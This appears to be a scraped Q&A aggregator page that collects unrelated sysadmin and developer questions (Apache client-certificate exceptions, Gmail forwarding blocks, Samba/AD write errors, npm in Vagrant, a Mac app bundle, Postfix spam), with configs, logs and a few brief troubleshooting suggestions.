    However, it does block access to https://my.server/foo. This presents a major problem for cases where I have some project running at https://my.server/project (which has to require SSL client certificate authorization), and there is a git repository for that project at https://my.server/git/project which cannot require an SSL client certificate. Since the /git/project URL also gets matched against /project Location blocks, such a configuration seems impossible given my current findings. Question: Why is this happening, and how do I solve my problem? In the end, I want to require SSL client certificate authorization for the whole server except for /git and /someLocation, with as minimal configuration as possible (so I don't have to modify the configuration each time something new is deployed or a new git repository is added). Note: I rewrote my question (instead of just adding more updates at the bottom) to take into account my new findings and hopefully make this clearer.
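
    Independent of why mod_ssl re-matches Location blocks against the script's trailing path here, one way to sidestep the merging puzzle entirely is to give git its own name-based vhost, so no Location exceptions are needed and new repositories require no config changes. A hedged sketch; the hostname and paths are placeholders, and name-based SSL vhosts on one IP need SNI (which Apache 2.2.16 with OpenSSL 0.9.8o on Debian 6 supports) or a second IP:

        <VirtualHost *:443>
            ServerName git.my.server
            SSLEngine on
            SSLCertificateFile    /etc/ssl/certs/my.server.crt
            SSLCertificateKeyFile /etc/ssl/private/my.server.key
            # deliberately no SSLVerifyClient here: git clients connect without certs
            ScriptAlias /git/ /path/to/gitolite-shell/
        </VirtualHost>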

    Read the article

  • Email forwarding from my domain to gmail - FAIL

    - by pitosalas
    [There are numerous similar questions on Server Fault, but I couldn't find one that was exactly on point.] Background: I use Gmail as my email client. My email is [email protected]; however, the address people use to write to me is [email protected]. I run the server that hosts www.example.com and other domains, at ServerBeach. Up to yesterday, I had SENDMAIL painlessly forward emails for [email protected] to [email protected], and everything was fine -- for several years, in fact. Suddenly my email stopped working; that is, my Gmail account stopped receiving emails via the forward from my server. Looking into it, I found a bunch of emails sitting on my server with content like this:

        ... while talking to gmail-smtp-in.l.google.com.:
        RCPT To:
        <<< 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
        <<< 450-4.2.1 prevents additional messages from being delivered. Please resend your
        <<< 450-4.2.1 message at a later time. If the user is able to receive mail at that
        <<< 450-4.2.1 time, your message will be delivered. For more information, please
        <<< 450 4.2.1 visit xxxxxx://mail.google.com/support/bin/answer.py?answer=6592 u15si37138086qco.76
        [email protected]... Deferred: 450-4.2.1 The user you are trying to contact is receiving mail at a rate that
        DATA
        <<< 550-5.7.1 [64.34.168.137 1] Our system has detected an unusual rate of
        <<< 550-5.7.1 unsolicited mail originating from your IP address. To protect our
        <<< 550-5.7.1 users from spam, mail sent from your IP address has been blocked.
        <<< 550-5.7.1 Please visit xxxxx://www.google.com/mail/help/bulk_mail.html to review
        <<< 550 5.7.1 our Bulk Email Senders Guidelines. u15si37138086qco.76
        554 5.0.0 Service unavailable
        ... while talking to alt1.gmail-smtp-in.l.google.com.:

    From what I've been researching, I think someone has been hijacking my domain name or otherwise abusing it, and this has somehow caused Gmail's servers to notice and cut me off. But I don't really know what's going on, nor do I see whatever emails might be involved. I've read material on zoneedit.com suggesting their service may handle what I am trying to do. I also read a lot about administering DNS and SENDMAIL and tried various things, but nothing works. Can you tell from my description what caused Gmail's servers to stop accepting email from my server, and is there a way to stop it? What is the 'correct' way to configure things so that emails to [email protected] behave as if they were sent to [email protected]? Thanks so much!
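
    Not from the original post, but a hedged first step before touching DNS: check what is actually sitting in sendmail's queue, since blindly forwarding inbound spam to Gmail is a well-known way for a small forwarder's IP to trip Google's rate limits and blocks. Assuming stock sendmail on the box:

        # list deferred messages and the reason each was deferred
        mailq | less

        # sendmail's mailq ends with a summary line such as "Total requests: 42"
        mailq | tail -n 1

    If the queue is full of bounced or deferred spam addressed to [email protected], the forward itself is the likely trigger rather than any domain hijack.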

    Read the article

  • How do I resolve "conflicting accounts" in Google Apps without breaking links to online photos on Picasa?

    - by lee
    I have been using Google Apps for some time, and only recently learned I have what Google calls "conflicting accounts," which is creating a problem I haven't been able to resolve. It turns out that the Apps account really only covers email, Google Docs, and the calendar -- not other services like Picasa, Blogger, YouTube, etc. -- and at some point Google gave me a non-Apps Google account with my same (proprietary, non-Gmail) email address for the additional services. This is the "conflicting account." I had noticed that I sometimes had to come in through another door when I went back and forth between Docs, Picasa, and Mail, say, but never understood why, since it was the same username and password and I didn't get any communication about it at the time.

    Google is now in the process of giving Google Apps users access to the additional services and providing instructions for consolidating the two accounts. But if I want to move my Picasa site into the new Apps structure, I have to download my albums and re-sync them. This would be disastrous for me, as I have hundreds of photos embedded in my websites, and new web addresses would break all the connections. The alternative seems to be to rename my "personal" (non-Apps) account as described at http://www.google.com/support/a/bin/answer.py?answer=185186:

        Users with conflicting Google Accounts can easily resolve their conflicts by renaming their personal Google Accounts, and the data in their personal accounts will remain safe and accessible to them. Here's how a user can rename their personal Google Account:
        * Step 1: Visit www.google.com/accounts and sign in with your personal Google Account
        * Step 2: Click 'Change email' under 'Personal Settings'
        * Step 3: Enter a different email address where you can receive mail, enter your password, and click 'Save email address'
        * Step 4: Check your other email
        If your users don't have different email addresses where they can receive mail, they can resolve the conflict by renaming their personal Google Accounts to @gmail.com addresses instead.

    Sounds easy enough, right? I gave them a Gmail address. The wizard said "sorry, you can't use a gmail account for this" -- which contradicts the last paragraph above, but OK, I switched to a new email address I had just created for one of my domains. I can send email back and forth between this account and my Google Apps account with no problem. But when I try to use it as the replacement on the "personal" side, I always get "The password you gave is incorrect." I have tried it over and over and know the password is correct. Since I like to get all my email through one web interface, I initially had the new address set up as an add-on to my Google Apps email account; but noting that the instructions said the "personal account" email could not be associated with any other Gmail account, I removed it and went back to accessing it via Horde so there would be no conflict there -- which seemed to make no difference. I can't figure out why it won't accept the password. Does anyone have any thoughts about that, or suggestions for another way to resolve my Picasa problem? Any help at all is greatly appreciated. Lee

    Read the article

  • Samba with Active Directory - shares are readonly, NT_STATUS_MEDIA_WRITE_PROTECTED

    - by froh42
    I've set up a Samba server that seems to work; however, all shares are apparently exported read-only. The machine is called "lx". When I'm on lx I can run the following command:

        froh@lx:~$ smbclient //lx/export -UAdministrator
        Enter Administrator's password:
        Domain=[CUSTOMER] OS=[Unix] Server=[Samba 3.5.4]
        smb: \> mkdir wrzlbrmpf
        NT_STATUS_MEDIA_WRITE_PROTECTED making remote directory \wrzlbrmpf
        smb: \> ls
          .      D  0  Fri Dec  3 19:04:20 2010
          ..     D  0  Sun Nov 28 01:32:37 2010
          zork   D  0  Fri Dec  3 18:53:33 2010
          bar    D  0  Sun Nov 28 23:52:43 2010
          ork       1  Fri Dec  3 18:53:02 2010
          foo       1  Sun Nov 28 23:52:41 2010
          gaga   D  0  Fri Dec  3 19:04:20 2010

    How can I troubleshoot this? What I did: first I set up a fresh install of Ubuntu 10.10 x64. Second, I got Kerberos working with the following krb5.conf file:

        [libdefaults]
            ticket_lifetime = 24000
            clock_skew = 300
            default_realm = CUSTOMER.LOCAL
        [realms]
            CUSTOMER.LOCAL = {
                kdc = SB4.customer.local:88
                admin_server = SB4.customer.local:464
                default_domain = CUSTOMER.LOCAL
            }
        [domain_realm]
            .customer.local = CUSTOMER.LOCAL
            customer.local = CUSTOMER.LOCAL
        #[login]
        #    krb4_convert = true
        #    krb4_get_tickets = false

    I also added winbind to group, passwd and shadow in nsswitch.conf. Kerberos seems to work:

        root@lx:~# net ads testjoin
        Join is OK
        root@lx:~# wbinfo -a 'Administrator%MYSECRETPASSWORD'
        plaintext password authentication succeeded
        challenge/response password authentication succeeded

    wbinfo -u and wbinfo -g also spit out a list of users and a list of groups, respectively. I noted that domain accounts did NOT include a domain prefix and they are in German (as on the SBS 2003 that is the domain server), so I get a "Domänenbenutzer" in wbinfo -u's output, not a "CUSTOMER+Domain User" or something similar. I'm not sure anymore what I did to the PAM configuration, but here is what I currently have:

        root@lx:/etc/pam.d# cat samba
        @include common-auth
        @include common-account
        @include common-session-noninteractive
        root@lx:/etc/pam.d# grep -ve '^#' common-auth
        auth [success=3 default=ignore] pam_krb5.so minimum_uid=1000
        auth [success=2 default=ignore] pam_unix.so nullok_secure try_first_pass
        auth [success=1 default=ignore] pam_winbind.so krb5_auth krb5_ccache_type=FILE cached_login try_first_pass
        auth requisite pam_deny.so
        auth required pam_permit.so
        root@lx:/etc/pam.d# grep -ve '^#' common-account
        account [success=2 new_authtok_reqd=done default=ignore] pam_unix.so
        account [success=1 new_authtok_reqd=done default=ignore] pam_winbind.so
        account requisite pam_deny.so
        account required pam_permit.so
        account required pam_krb5.so minimum_uid=1000
        root@lx:/etc/pam.d# grep -ve '^#' common-session-noninteractive
        session [default=1] pam_permit.so
        session requisite pam_deny.so
        session required pam_permit.so
        session optional pam_krb5.so minimum_uid=1000
        session required pam_unix.so
        session optional pam_winbind.so

    At some point I joined the Linux box into the AD domain. After (manually) creating a home directory on the Linux box, I can log in as the Administrator user with the password taken from AD. Now I run Samba with the following setup:

        [global]
            netbios name = LX
            realm = CUSTOMER.LOCAL
            workgroup = CUSTOMER
            security = ADS
            encrypt passwords = yes
            password server = 192.168.20.244   # IP of the domain controller
            os level = 0
            socket options = TCP_NODELAY SO_RCVBUF=16384 SO_SNDBUF=16384
            idmap uid = 10000-20000
            idmap gid = 10000-20000
            winbind enum users = Yes
            winbind enum groups = Yes
            preferred master = no
            winbind separator = +
            dns proxy = no
            wins proxy = no
            # client NTLMv2 auth = Yes
            log level = 2
            logfile = /var/log/samba/log.smbd.%U
            template homedir = /home/%U
            template shell = /bin/bash

        [export]
            path = /mnt/sdc1/export
            read only = No
            public = Yes

    Currently I don't care whether export is exported to everyone or just one user; I want to see somebody WRITING to that directory before I start fiddling with the authentication settings (who may access it). As mentioned, accessing the share from smbclient results in NT_STATUS_MEDIA_WRITE_PROTECTED. Accessing it from Windows shows ACLs that look correct (the user may write) -- but it does not work; I can only read files, not write. The directory to be exported looks like this:

        root@lx:/etc/pam.d# ls -ld /mnt/
        drwxr-xr-x 5 root root 4096 2010-11-28 01:29 /mnt/
        root@lx:/etc/pam.d# ls -ld /mnt/sdc1/
        drwxr-xr-x 4 froh froh 4096 2010-11-28 01:32 /mnt/sdc1/
        root@lx:/etc/pam.d# ls -ld /mnt/sdc1/export/
        drwxrwxrwx+ 5 administrator domänen-admins 4096 2010-12-03 19:04 /mnt/sdc1/export/
        root@lx:/etc/pam.d# getfacl /mnt/
        # file: mnt/
        # owner: root
        # group: root
        user::rwx
        group::r-x
        other::r-x
        root@lx:/etc/pam.d# getfacl /mnt/sdc1/
        # file: mnt/sdc1/
        # owner: froh
        # group: froh
        user::rwx
        group::r-x
        other::r-x
        root@lx:/etc/pam.d# getfacl /mnt/sdc1/export/
        # file: mnt/sdc1/export/
        # owner: administrator
        # group: domänen-admins
        user::rwx
        group::rwx
        group:domänen-admins:rwx
        mask::rwx
        other::rwx
        default:user::rwx
        default:group::rwx
        default:group:domänen-admins:rwx
        default:mask::rwx
        default:other::rwx

    My, oh my, what am I overlooking? What am I too blind to see?
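
    A hedged debugging step (not from the original post): raise the log level and watch the per-user log file that the smb.conf above already configures, while repeating the failing mkdir. That should show whether Samba itself refuses the write (share- or idmap-level) or whether the operation fails at the filesystem:

        # in smb.conf [global], temporarily:
        log level = 3

        # then, in another shell, while re-running the smbclient mkdir:
        tail -f /var/log/samba/log.smbd.Administrator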

    Read the article

  • NPM not installing dependencies?

    - by neezer
    Having trouble getting npm to install dependencies with npm install -d in my project directory with a defined package.json file. Here's my package.json: https://gist.github.com/3068312. After wiping my project root's node_modules folder (rm -rf node_modules), I run npm install -d in my project root and am greeted with this:

        (ssh) /vagrant git:master ? npm install -d
        npm info it worked if it ends with ok
        npm info using [email protected]
        npm info using [email protected]
        npm info preinstall [email protected]
        npm http GET https://registry.npmjs.org/sinon
        npm http GET https://registry.npmjs.org/underscore
        npm http GET https://registry.npmjs.org/mocha
        npm http GET https://registry.npmjs.org/request
        npm http 304 https://registry.npmjs.org/sinon
        npm http 304 https://registry.npmjs.org/underscore
        npm http 304 https://registry.npmjs.org/mocha
        npm http 304 https://registry.npmjs.org/request
        npm info into /vagrant [email protected]
        npm info into /vagrant [email protected]
        npm info into /vagrant [email protected]
        npm info into /vagrant [email protected]
        npm info installOne [email protected]
        npm info installOne [email protected]
        npm info installOne [email protected]
        npm info installOne [email protected]
        npm info unbuild /vagrant/node_modules/underscore
        npm info unbuild /vagrant/node_modules/mocha
        npm info unbuild /vagrant/node_modules/sinon
        npm info unbuild /vagrant/node_modules/request
        npm ERR! error installing [email protected]
        npm info unbuild /vagrant/node_modules/underscore
        npm ERR! error rolling back [email protected] Error: UNKNOWN, unknown error '/vagrant/node_modules/underscore'
        npm ERR! Error: ENOENT, no such file or directory '/vagrant/node_modules/underscore/package.json'
        npm ERR! You may report this log at:
        npm ERR!     <http://bugs.debian.org/npm>
        npm ERR! or use
        npm ERR!     reportbug --attach /vagrant/npm-debug.log npm
        npm ERR!
        npm ERR! System Linux 3.2.0-23-generic
        npm ERR! command "node" "/usr/bin/npm" "install" "-d"
        npm ERR! cwd /vagrant
        npm ERR! node -v v0.6.12
        npm ERR! npm -v 1.1.4
        npm ERR! path /vagrant/node_modules/underscore/package.json
        npm ERR! code ENOENT
        npm ERR! message ENOENT, no such file or directory '/vagrant/node_modules/underscore/package.json'
        npm ERR! errno {}
        npm ERR! error installing [email protected]
        npm info unbuild /vagrant/node_modules/request
        npm ERR! error rolling back [email protected] Error: UNKNOWN, unknown error '/vagrant/node_modules/request'
        npm ERR!
        npm ERR! Additional logging details can be found in:
        npm ERR!     /vagrant/npm-debug.log
        npm not ok

    If I rerun npm install -d, the error changes to whatever the next package is. If I keep running it over and over, it eventually stops complaining and outputs:

        (ssh) /vagrant git:master ? npm install -d
        npm info it worked if it ends with ok
        npm info using [email protected]
        npm info using [email protected]
        npm info preinstall [email protected]
        npm info build /vagrant
        npm info linkStuff [email protected]
        npm info install [email protected]
        npm info postinstall [email protected]
        npm info ok

    However, none of the dependencies for any of these packages get installed. For instance, cheerio has a few dependencies, so when I try running my test suite, I'm greeted with:

        (ssh) /vagrant git:master ? mocha --compilers coffee:coffee-script --watch spec/*
        node.js:201
          throw e; // process.nextTick error, or 'error' event on first tick
          ^
        Error: Cannot find module 'cheerio-select'
            at Function._resolveFilename (module.js:332:11)
            at Function._load (module.js:279:25)
            at Module.require (module.js:354:17)

    What gives? I'm on Ubuntu Precise64 in a Vagrant virtual box.
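
    A hedged workaround, assuming /vagrant is a VirtualBox shared folder: shared folders are known to mishandle the renames and symlinks npm performs during its unbuild/rollback steps, which fits the UNKNOWN/ENOENT errors above. Keeping node_modules on the guest's native filesystem and linking it into the share is one sketch (the directory name is arbitrary):

        # put the real node_modules on the VM's own disk
        mkdir -p ~/vagrant_node_modules
        rm -rf /vagrant/node_modules
        ln -s ~/vagrant_node_modules /vagrant/node_modules

        # then install as usual
        cd /vagrant && npm install -d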

    Read the article

  • Cannot open the simplest Mac application

    - by streetpc
    I created a very simple app, which is only a wrapper around a shell script (so that I can select the script in application selectors, like the startup-items list). Yesterday it launched fine, but today I changed the executable script's content and name (to something that works perfectly when run as a shell script in the Terminal), and now it only displays a Finder-iconed dialog saying "Cannot open the application because it is not supported on this kind of Mac." I restored the previous script (content and name), but I still get the error! Same when re-bundling the app from scratch, or completely changing the bundle identifier… If I try to open it in the Terminal using open My.app, I get "The application cannot be opened because it has an incorrect executable format." But when I execute Contents/MacOS/Script directly, it always works (with both script contents). Also, it is displayed with the correct icon and meta-information in the Finder (so I guess the Info.plist is understood). The app's file tree is:

        Contents/
            Info.plist
            MacOS/
                Script      (executable bit set, works when launched directly)
            PkgInfo
            Resources/
                AppIcon.icns

    Here is the Info.plist content:

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
        <plist version="1.0">
        <dict>
            <key>CFBundleExecutable</key>
            <string>Script</string>
            <key>CFBundleIconFile</key>
            <string>AppIcon</string>
            <key>CFBundleIdentifier</key>
            <string>asdf.ScriptApp</string>
            <key>CFBundleInfoDictionaryVersion</key>
            <string>6.0</string>
            <key>CFBundleName</key>
            <string>My script</string>
            <key>CFBundlePackageType</key>
            <string>APPL</string>
            <key>CFBundleShortVersionString</key>
            <string>1.0</string>
            <key>CFBundleSignature</key>
            <string>????</string>
            <key>CFBundleVersion</key>
            <string>1</string>
            <key>LSMinimumSystemVersion</key>
            <string>10.4</string>
        </dict>
        </plist>

    The PkgInfo file contains only APPL????. I tested the Script with a simple echo "ok" and with echo "ok" >/tmp/test (plus a #!/bin/sh header). So my questions are:
    * Is there some kind of validity caching for applications? Based on what? How do I flush it?
    * Where does this message come from? I tried to Google it, but all I get is a page talking about 32/64-bit Java…
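
    One hedged thing to try (not from the original post): Launch Services caches bundle metadata, and a stale cache entry can outlive edits to the bundle. Forcing re-registration with the lsregister tool sometimes clears such errors; the path below is where the tool lives on 10.5/10.6 and may differ on other OS versions:

        # force Launch Services to re-register the bundle
        /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /path/to/My.app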

    Read the article

  • Samba doesn't require a password on XBMC but does on Ubuntu

    - by Chris
    I have Samba set up on a Fedora 13 machine, and I use it to share with my XBMC client in the family room. When I set this up, no password or anything was required; I merely entered paths such as smb://<host>/<share> and everything worked. Now, on my Ubuntu 10.04 machine, when I try to access the same host, for example through smbmount, I receive an error:

        smbmount //media/Music ~/Music/
        # "media" is in my /etc/hosts and resolves to the
        # correct IP address for the machine

    I receive "operation not permitted" after pressing Enter when it prompts for a password. Here is my entry from /etc/samba/smb.conf:

        [global]
        workgroup = WORKGROUP
        server string = Samba Server Version %v
        # log files split per-machine:
        log file = /var/log/samba/log.%m
        # maximum size of 50KB per log file, then rotate:
        max log size = 50
        security = user
        passdb backend = tdbsam
        ; security = domain
        ; passdb backend = tdbsam
        ; realm = MY_REALM
        ; password server = <NT-Server-Name>
        ; security = user
        ; passdb backend = tdbsam
        ; domain master = yes
        ; domain logons = yes
        ; logon script = %m.bat
        ; logon script = %u.bat
        ; logon path = \\%L\Profiles\%u
        ; logon path =
        ; add user script = /usr/sbin/useradd "%u" -n -g users
        ; add group script = /usr/sbin/groupadd "%g"
        ; add machine script = /usr/sbin/useradd -n -c "Workstation (%u)" -M -d /nohome -s /bin/false "%u"
        ; delete user script = /usr/sbin/userdel "%u"
        ; delete user from group script = /usr/sbin/userdel "%u" "%g"
        ; delete group script = /usr/sbin/groupdel "%g"
        ; local master = no
        ; os level = 33
        ; preferred master = yes
        ; wins support = yes
        ; wins server = w.x.y.z
        ; wins proxy = yes
        ; dns proxy = yes
        load printers = yes
        cups options = raw
        ; printcap name = /etc/printcap
        # obtain a list of printers automatically on UNIX System V systems:
        ; printcap name = lpstat
        ; printing = cups
        ; map archive = no
        ; map hidden = no
        ; map read only = no
        ; map system = no
        ; store dos attributes = yes

        #============================ Share Definitions ==============================

        [homes]
        comment = Home Directories
        browseable = no
        writable = yes
        ; valid users = %S
        ; valid users = MYDOMAIN\%S

        # Un-comment the following and create the netlogon directory for Domain Logons:
        ; [netlogon]
        ; comment = Network Logon Service
        ; path = /var/lib/samba/netlogon
        ; guest ok = yes
        ; writable = no
        ; share modes = no

        # Un-comment the following to provide a specific roving profile share.
        # The default is to use the user's home directory:
        ; [Profiles]
        ; path = /var/lib/samba/profiles
        ; browseable = no
        ; guest ok = yes

        # A publicly accessible directory that is read only, except for users in the
        # "staff" group (which have write permissions):
        ; [public]
        ; comment = Public Stuff
        ; path = /home/samba
        ; public = yes
        ; writable = yes
        ; printable = no
        ; write list = +staff

        [tv]
        comment = TV
        path = /media/Isos/tv
        public = yes
        writable = yes
        printable = no
        write list = +media

        [music]
        comment = Music
        path = /media/Storage/music/
        public = yes
        writable = yes
        printable = no
        write list = +media

        [pictures]
        comment = Pictures
        path = /media/Storage/pictures
        public = yes
        writable = yes
        printable = no
        write list = +media
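
    A hedged guess (not from the original post): XBMC most likely connects as a guest, while smbmount defaults to an authenticated session, and the config above uses security = user with no guest fallback. If true guest access is wanted, one sketch is to map unknown users to the guest account on the server and mount explicitly as guest from Ubuntu; both options are standard Samba/CIFS, but test before relying on them:

        # on the Fedora server, in smb.conf [global]:
        map to guest = Bad User    # unknown usernames fall back to the guest account

        # on the Ubuntu client:
        sudo mount -t cifs //media/Music ~/Music -o guest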

    Read the article

  • Is my SMTP server being used to send spam?

    - by Milos
    I have a server running Postfix. For the last several days I've noticed a lot of processes running there, and when I checked, a lot of emails were being sent. Here is an example from the mail log:

        Aug 18 11:54:56 mem postfix/smtpd[9963]: connect from dslb-188-096-082-167.188.096.pools.vodafone-ip.de[188.96.82.167]
        Aug 18 11:54:56 mem postfix/smtpd[9301]: connect from unknown[186.113.45.4]
        Aug 18 11:54:56 mem postfix/smtpd[9963]: 525E7114012D: client=dslb-188-096-082-167.188.096.pools.vodafone-ip.de[188.96.82.167]
        Aug 18 11:54:56 mem postfix/cleanup[9970]: 525E7114012D: message-id=<B55835C9027BFA9D16CCBB556DB2F48BB82DF004000480BA-db0c3ce8aa74446411898d0d2feb3001@email.filmforthoughtinc.com>
        Aug 18 11:54:56 mem postfix/qmgr[2581]: 525E7114012D: from=<[email protected]>, size=10702, nrcpt=1 (queue active)
        Aug 18 11:54:56 mem postfix/smtpd[9301]: EC52711401DC: client=unknown[186.113.45.4]
        Aug 18 11:54:57 mem postfix/smtpd[9963]: disconnect from dslb-188-096-082-167.188.096.pools.vodafone-ip.de[188.96.82.167]
        Aug 18 11:54:57 mem postfix/cleanup[8597]: EC52711401DC: message-id=<4C905D97606B436FE50C6F738DE014D9D84F2185BA815D81-1a4dbe6fc2bfcc8183f5faf901cfa15e@email.manguerasespecializadas.com>
        Aug 18 11:54:57 mem postfix/smtp[9971]: 525E7114012D: to=<[email protected]>, relay=mail.mdpi.com[209.237.236.228]:25, delay=1.2, delays=0.55/0/0.45/0.16, dsn=5.1.1, status=bounced (host mail.mdpi.com[209.237.236.228] said: 550 5.1.1 <[email protected]>: Recipient address rejected: mdpi.com (in reply to RCPT TO command))
        Aug 18 11:54:57 mem postfix/cleanup[10067]: 8B1E11140268: message-id=<[email protected]>
        Aug 18 11:54:57 mem postfix/bounce[10001]: 525E7114012D: sender non-delivery notification: 8B1E11140268
        Aug 18 11:54:57 mem postfix/qmgr[2581]: 8B1E11140268: from=<>, size=12693, nrcpt=1 (queue active)
        Aug 18 11:54:57 mem postfix/qmgr[2581]: 525E7114012D: removed
        Aug 18 11:54:57 mem postfix/qmgr[2581]: EC52711401DC: from=<[email protected]>, size=10978, nrcpt=1 (queue active)
        Aug 18 11:54:57 mem postfix/smtp[10013]: connect to aspmx.l.google.com[2607:f8b0:400d:c03::1b]:25: Network is unreachable
        Aug 18 11:54:57 mem postfix/smtpd[9301]: disconnect from unknown[186.113.45.4]
        Aug 18 11:54:58 mem postfix/smtp[10013]: 8B1E11140268: to=<[email protected]>, relay=aspmx.l.google.com[74.125.22.26]:25, delay=0.5, delays=0.06/0/0.28/0.16, dsn=5.1.1, status=bounced (host aspmx.l.google.com[74.125.22.26] said: 550-5.1.1 The email account that you tried to reach does not exist. Please try 550-5.1.1 double-checking the recipient's email address for typos or 550-5.1.1 unnecessary spaces. Learn more at 550 5.1.1 http://support.google.com/mail/bin/answer.py?answer=6596 l7si24621420qad.26 - gsmtp (in reply to RCPT TO command))
        Aug 18 11:54:58 mem postfix/qmgr[2581]: 8B1E11140268: removed
        Aug 18 11:54:58 mem postfix/smtp[9971]: EC52711401DC: to=<[email protected]>, relay=mail.mdpi.com[209.237.236.228]:25, delay=1.2, delays=0.66/0/0.44/0.12, dsn=5.1.1, status=bounced (host mail.mdpi.com[209.237.236.228] said: 550 5.1.1 <[email protected]>: Recipient address rejected: mdpi.com (in reply to RCPT TO command))
        Aug 18 11:54:58 mem postfix/cleanup[9970]: 414361140254: message-id=<[email protected]>
        Aug 18 11:54:58 mem postfix/bounce[10001]: EC52711401DC: sender non-delivery notification: 414361140254
        Aug 18 11:54:58 mem postfix/qmgr[2581]: 414361140254: from=<>, size=13057, nrcpt=1 (queue active)
        Aug 18 11:54:58 mem postfix/qmgr[2581]: EC52711401DC: removed
        Aug 18 11:55:01 mem postfix/smtp[10002]: 414361140254: to=<[email protected]>, relay=manguerasespecializadas.com[99.198.96.210]:25, delay=2.9, delays=0.04/0/2.1/0.84, dsn=2.0.0, status=sent (250 OK id=1XJPGs-0007BE-OI)
        Aug 18 11:55:01 mem postfix/qmgr[2581]: 414361140254: removed

    Is my server being attacked or abused to send spam? How can I check? Thank you.
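
    Some hedged first checks with standard Postfix tooling (not from the original post): the log shows arbitrary outside clients (a Vodafone DSL line, an unknown host) handing the server mail for third-party domains, which points at an open relay, a compromised account, or a local script injecting mail. To size the problem and inspect the relay policy:

        # how much mail is queued? (postqueue prints a summary as its last line)
        postqueue -p | tail -n 1

        # which networks may relay, and what recipient restrictions apply?
        postconf mynetworks smtpd_recipient_restrictions

    If mynetworks is wider than the host itself or smtpd_recipient_restrictions lacks a reject rule for unauthenticated relaying, that would explain the traffic.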

    Read the article
